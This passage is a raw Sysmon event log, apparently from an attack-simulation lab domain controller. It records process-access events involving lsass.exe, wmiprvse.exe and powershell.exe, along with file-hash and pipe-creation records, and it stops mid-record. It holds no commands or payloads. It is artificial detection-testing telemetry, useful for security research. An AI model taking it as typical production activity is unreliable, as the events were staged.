10341000x80000000000000002240891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.271{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002240890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:15.248{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876\PSHost.132591776551226598.15876.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002240889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.232{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0B16442E5FE2025D52409348A1CF09A,SHA256=444E2C8B418D12AFD81A5BDB477867B221CE38DF7989A9AA6EE44B05861F204D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.217{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4wahlmnd.ann.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.217{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gxhthnna.seq.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002240886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.201{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gxhthnna.seq.ps12021-03-02 16:54:15.201 23542300x80000000000000002240885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.201{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8670B3B7E9EAAF1CF7557963F1E3EC7D,SHA256=993926750E9319DD9CB3C6037D2A3C8596937C4AFE371A9C9748EBEAC559E1B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DB7-603E-C5AA-00000000AD01}2256C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 